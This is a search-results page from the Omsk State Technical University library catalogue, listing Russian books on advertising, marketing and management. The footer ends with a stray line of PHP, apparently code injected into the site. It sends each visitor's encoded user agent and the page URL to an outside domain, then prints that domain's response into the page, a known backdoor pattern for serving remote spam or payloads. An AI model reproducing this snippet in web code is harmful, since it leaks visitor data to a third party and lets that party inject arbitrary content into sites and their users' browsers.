Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

59 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=РЕКЛАМНАЯ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 440
1. 
Искусство рекламы [Текст] : Теория и практика соврем. рекламы / Н. С. Пушкарев, 1992. - 189 с.
Держатели документа (Информация об экземплярах) 
2. 
Уэллс, Уильям. Реклама: принципы и практика [Текст] / У. Уэллс, Д. Бернет, С. Мориарти; М. Артюх, 1999. - 735 с.
Держатели документа (Информация об экземплярах) 
3. 
Ученова, Виктория Васильевна. История рекламы [Текст] : Детство и отрочество / В. В. Ученова, Н. В. Старых, 1994. - 96 с.
Держатели документа (Информация об экземплярах) 
4. 
Рекламная деятельность [Текст] : Учеб. для вузов / Ф. Г. Панкратов, Ю. К. Баженов, Т. К. Серегина, В. Г. Шахурин, 1999. - 362 с.
Держатели документа (Информация об экземплярах) 
5. 
Федотова, Лариса Николаевна. Социология рекламы [Текст] : Учеб. пособие для вузов / Л. Н. Федотова, 1999. - 338 с.
Держатели документа (Информация об экземплярах) 
6. 
Саркисян О. А. Конспект рекламиста [Текст] / О. А. Саркисян, О. А. Груздева, Г. В. Красовский, 1999. - 133 с.
Держатели документа (Информация об экземплярах) 
7. 
Практическое руководство по организации эффективной рекламной деятельности предприятия [Текст]. Т. 2, 1994. - 88 с.
Держатели документа (Информация об экземплярах) 
8. 
Практическое руководство по организации эффективной рекламной деятельности предприятия [Текст]. Т. 1, 1994. - 76 с.
Держатели документа (Информация об экземплярах) 
9. 
Рекламная деятельность [Текст] : Учеб. для вузов / Ф. Г. Панкратов, Ю. К. Баженов, Т. К. Серегина, В. Г. Шахурин, 2000. - 361, [1] с.
Держатели документа (Информация об экземплярах) 
10. 
Кафтанджиев, Христо. Тексты печатной рекламы [Текст] / Х. Кафтанджиев; Пер. с болг. А. Ю. Погарской, Под ред. М. Дымшица, 1995. - 127 с.
Держатели документа (Информация об экземплярах) 
11. 
Гольман, Иосиф Абрамович. Практика рекламы [Текст] : Десять уроков для совет. бизнесмена / И. А. Гольман, Н. С. Добробабенко, 1991. - 141 с.
Держатели документа (Информация об экземплярах) 
12. 
Асеева Е. Н. Организация рекламной кампании [Текст] / Е. Н. Асеева, П. В. Асеев, 1997. - 111 с.
Держатели документа (Информация об экземплярах) 
13. 
Старобинский, Эдгар Евгеньевич. Самоучитель по рекламе [Текст] / Э. Е. Старобинский, 1999. - 352 с.
Держатели документа (Информация об экземплярах) 
14. 
Уткин, Эдуард Андреевич. Рекламное дело [Текст] : Учеб. / Э. А. Уткин, А. И. Кочеткова, 1998. - 271 с.
Держатели документа (Информация об экземплярах) 
15. 
Рой, Олег Михайлович. Менеджмент современной фирмы: организация, стратегия, финансы [Текст] : Конспект лекций / О. М. Рой, А. М. Зараева, 1998. - 116 с.
Оглавление 
Держатели документа (Информация об экземплярах) 

В работе исследуются основные принципы и методы научного управления предприятием в ключевых звеньях его функционирования. Пособие содержит три раздела: организационный, стратегический и финансовый менеджмент, рассматриваемые в логической взаимосвязи. Темы раздела соответствуют стандартам образовательных программ по специальностям 060800 «Экономика и управление на предприятиях», 061100 «Менеджмент»

Полный текст
16. 
Музыкант, Валерий Леонидович. Теория и практика современной рекламы [Текст] : Учеб. пособие по курсу "Паблик рилейшнз" и "Реклама". Ч. 2 : Политические рекламные технологии, 1998. - 323, [1] с.
Держатели документа (Информация об экземплярах) 
17. 
Батра, Раджив. Рекламный менеджмент [Текст] : Пер. с англ. / Р. Батра, Д. Дж. Майерс, Д. А. Аакер, 1999. - 780 с.
18. 
Олвуд, Джон. Выставки: планирование и дизайн [Текст] : Рук. для деловых людей, дизайнеров, устроителей и участников выст.: Пер. с англ. / Д. Олвуд, Б. Монтгомери, 1991. - 154 с.
Держатели документа (Информация об экземплярах) 
19. 
Музыкант, Валерий Леонидович. Теория и практика современной рекламы [Текст] : Моногр. Ч. 1 : Зарождение и генезис рекламы, 1998. - 399 с.
Держатели документа (Информация об экземплярах) 
20. 
Музыкант, Валерий Леонидович. Реклама: международный опыт и российские традиции [Текст] / В. Л. Музыкант, 1996. - 220 с.


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2964 - 22.07.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.29 с.12 запросов, 0.78c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;